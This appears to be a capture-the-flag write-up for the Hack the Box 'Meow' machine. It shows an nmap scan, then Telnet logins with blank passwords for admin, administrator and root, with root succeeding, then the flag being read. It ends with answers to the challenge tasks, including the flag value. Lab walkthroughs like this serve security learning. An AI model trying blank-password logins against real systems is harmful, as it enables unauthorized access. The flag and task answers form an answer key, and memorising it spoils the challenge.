TL;DR
This writeup is based on the Meow machine, which is an easy-rated Linux box on Hack the Box. I began by scanning the target and found an open Telnet port (23)
. After enumerating the service, I attempted logging in with common usernames and blank passwords. While admin
and administrator
failed, I successfully accessed the system using the root
account with no password. With root access, I retrieved the flag and completed the challenge.
Scanning Network
I began by performing an Nmap scan, which revealed open ports 23 , corresponding to telnet. Here are the results from Nmap scan:
1
2
3
4
5
6
7
| nmap -sC -sV -A -T4 -Pn -oN scan/normal.scan 10.129.223.201
Nmap scan report for 10.129.223.201
Host is up (0.22s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
Enumeration
Telnet
is a network protocol that enables remote communication with devices using a text-based interface over TCP, typically on port 23
. It allows users to access and manage systems but transmits data in plaintext, making it insecure. Due to its lack of encryption, Telnet has largely been replaced by SSH for secure remote access. However, it is still useful for testing network services, checking open ports, and interacting with protocols like HTTP and SMTP.
While doing some Google searches on this protocol, I found out that it is an old service used for the remote management of other hosts on the network.
Since the target is running this service, it can receive Telnet connection requests from other hosts on the network.
Connection requests through Telnet are configured with a combination of a username and password for increased security.
1
2
3
4
5
6
7
8
9
10
11
| telnet 10.129.223.201 23
Trying 10.129.223.201...
Connected to 10.129.223.201.
Escape character is '^]'.
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login:
|
I have to find some credentials to continue the work since I don’t have any other ports on the target.
Sometimes due to configuration issue, some important accounts can be left without a passwords. We can brute force some typical important account such as admin
, administrator
,root
with blank password.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| telnet 10.129.223.201 23
Trying 10.129.223.201...
Connected to 10.129.223.201.
Escape character is '^]'.
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login: admin
Password:
Login incorrect
Meow login: administrator
Password:
Login incorrect
|
Exploitation
The first two try were unlucky. Let’s try root
account for login.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| telnet 10.129.223.201 23
Trying 10.129.223.201...
Connected to 10.129.223.201.
Escape character is '^]'.
█ █ ▐▌ ▄█▄ █ ▄▄▄▄
█▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀
█ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 15 Feb 2025 04:29:29 AM UTC
System load: 0.22
Usage of /: 41.7% of 7.75GB
Memory usage: 4%
Swap usage: 0%
Processes: 134
Users logged in: 0
IPv4 address for eth0: 10.129.223.201
IPv6 address for eth0: dead:beef::250:56ff:fe94:e0f1
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Feb 15 04:16:18 UTC 2025 on pts/0
root@Meow:~#
|
I have successfully logged in as root
user in target machine. So, let’s read the flag now.
1
2
3
4
5
| root@Meow:~# ls
flag.txt snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~# exit
|
Tasks
What does the acronym VM stand for?
What service do we identify on port 23/tcp during our scans?
What username is able to log into the target over telnet with a blank password?
Submit root flag
1
| b40abdfe23665f766f9c61ecba8a4c19
|
Thanks for reading this far. If you enjoyed the writeup, do support me here.